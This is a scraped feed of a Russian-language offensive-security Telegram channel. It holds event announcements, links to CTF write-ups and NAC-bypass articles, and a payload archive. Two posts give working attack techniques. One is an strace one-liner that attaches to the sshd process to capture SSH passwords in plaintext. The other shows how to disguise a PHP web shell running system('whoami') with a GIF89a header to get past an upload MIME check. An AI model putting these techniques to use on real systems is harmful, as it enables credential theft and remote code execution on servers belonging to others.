Какой бы ни была причина, сокрытие вашей личности в сети на уровне Ethernet дает значительные преимущества при внутренней оценке безопасности.
Одним из практических способов добиться этого является использование метода, который мы любим называть «Ethernet Ghosting», когда законное устройство в сети используется в качестве маски для маскировки связи с устройством злоумышленника.
Читать
#Обход
Please open Telegram to view this post
VIEW IN TELEGRAM
Telegraph
Призрачный Ethernet & Обход NAC – Практический обзор
Всем привет! С вами wr3dmast3r, и сегодня мы узнаем как использовать наше устройство в режиме призрака на уровне ethernet. Введение Даже при наличии прямого физического доступа к сети (клиент вручает вам кабель локальной сети) некоторые оценки безопасности…
❤15⚡8👍7🔥7
Теперь ветка в нашем чате кибер ивенты будет активно заполняться.
#CTF
Please open Telegram to view this post
VIEW IN TELEGRAM
❤15🔥8⚡3👍3
Предлагаем вам посетить ближайший их ивент
AM Live: Аппаратное обеспечение для российского ИБ
📅14 декабря, СР, 11:00
В прямом эфире обсудим:
🔸Сможет ли рынок информационной безопасности адаптироваться к новой реальности?
🔸Получится ли избежать тотального дефицита оборудования?
🔸 Россия не производит современные микропроцессоры, чипы памяти, СХД и много чего еще. Есть ли шансы это исправить?
🔸Спрос и предложение на аппаратное обеспечение для ИБ
Модератор:
🔸Руслан Иванов, Директор офиса развития инфраструктуры стратегических корпоративных заказчиков «Ростелеком-Солар»
Спикеры:
🔸Павел Коростелев, Руководитель отдела продвижения продуктов «Код Безопасности»
🔸Карина Абагян, Директор по стратегическому развитию
АО "Микрон"
🔸Сергей Плотко, Директор по аналитике и интеграции АО "НПП "Цифровые решения"
🔸Константин Закатов, Руководитель Департамента информационной безопасности ООО «ПК АКВАРИУС»
Принять участие
#Разное
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡9🔥8👍2
This media is not supported in your browser
VIEW IN TELEGRAM
RESOLUTE ATTACK
Строчит курс PRTT 😂
Please open Telegram to view this post
VIEW IN TELEGRAM
🤣35❤6👍4
Forwarded from SecuriXy.kz
Новость бударажущая ум и представление о безопасности Linux*
Так сказать мир был до этой новости и теперь…
Получаем пароль от SSH в открытом виде
*
1. получаем точный идентификатор sshd
2. Отслеживаем системные вызовы
Ну или одной строкой
#ssh #sniff #password
Так сказать мир был до этой новости и теперь…
Получаем пароль от SSH в открытом виде
*
1. получаем точный идентификатор sshd
pgrep -l sshd
2. Отслеживаем системные вызовы
strace -f -p <ssh_PID> -e trace=write -o capture
Ну или одной строкой
strace -f -p $(service sshd status |grep PID|awk "{print \$3}") -e trace=write -o capture
#ssh #sniff #password
❤18🔥9⚡4👍4
Please open Telegram to view this post
VIEW IN TELEGRAM
Telegraph
Scraping директорий на Python
Всем привет! С вами wr3dmast3r, и сегодня мы напишем простой скрапер директорий сайта. Приступим.
🔥17⚡6👍5
Please open Telegram to view this post
VIEW IN TELEGRAM
Telegraph
WriteUpTHM - 0day
Всем привет! С вами wr3dmast3r, и сегодня мы разберем ctf с tryhackme. Содержание Запуск Nikto, чтобы найти точку входа Ошибка, которая показывает, что страница уязвима для shellshock Выполнение Curl запроса к веб-серверу Однострочная обратная оболочка с…
❤17🔥12👍6
Можно обмануть проверку безопасности mime-типа, чтобы думать, что загруженный файл является изображением, но на самом деле веб-сервер распознает его как файл скрипта PHP.
Для этого нам нужно добавить только одну строку в начале нашего скрипта:
GIF89a;
GIF89a - это заголовок файла GIF. Когда файл просматривается, mime_content_type("myfile");он вводится в заблуждение, чтобы думать, что это изображение, а не оболочка PHP.GIF89a;
<?php
system('whoami'); # shellcode goes here
?>
RESOLUTE ATTACK#Обход
Please open Telegram to view this post
VIEW IN TELEGRAM
❤17👍11🔥6😍3🤣3
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥22👍5❤4⚡2
Завтра в 20:00 (мск)
В докладе мы разберём тему:
"Пентест 1С-БИТРИКС".
Разберём такие моменты как: Уязвимости и атаки на 1c-bitrix,поиск php скриптов ajax,панель разработчика,js скрипты и их секреты,фаззинг. Атаки на скрипты, поиск скрытых параметров,фаззинг параметров,тестирование на типовые уязвимости
Представитель канала - https://t.me/netrunnerz
Сергей является специалистом в сфере этичного хакинга. На данный момент штатный сотрудник компании visum. Имеет опыт выступлений во внутренней структуре своей компании.
Доклад будет проходить на нашем ютуб канале
#Тестирование #1C_Битрикс
Please open Telegram to view this post
VIEW IN TELEGRAM
👍15🔥10❤6⚡3
PayloadsTadn3wb.tar.gz
1.8 GB
🔥32❤8😈8
h4ck1ng.google
E1TEX|RESOLUTE ATTACK
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥25👨💻9👍6⚡4❤2
Please open Telegram to view this post
VIEW IN TELEGRAM
Telegraph
WriteUpTHM - Anonymous
Всем привет! С вами wr3dmast3r, и сегодня мы взломаем анонимусов на трайхакми. Начнём со сканирования с помощью nmap: Результат сканирования показывает нам, что открыто 4 порта: 21, 22, 139 и 445. Начнём с SMB. Делаем вывод, что анонимный доступ к SMB возможен…
❤18🔥8⚡5👍3
УЖЕ ЧЕРЕЗ ОДИН ЧАС
В докладе мы разберём тему:
"Пентест 1С-БИТРИКС".
Разберём такие моменты как: Уязвимости и атаки на 1c-bitrix,поиск php скриптов ajax,панель разработчика,js скрипты и их секреты,фаззинг. Атаки на скрипты, поиск скрытых параметров,фаззинг параметров,тестирование на типовые уязвимости
Представитель канала - https://t.me/netrunnerz
Сергей является специалистом в сфере этичного хакинга. На данный момент штатный сотрудник компании visum. Имеет опыт выступлений во внутренней структуре своей компании.
Доклад будет проходить на нашем ютуб канале
#Тестирование #1C_Битрикс
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥15❤7👍4
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥26🤩6😍5👍3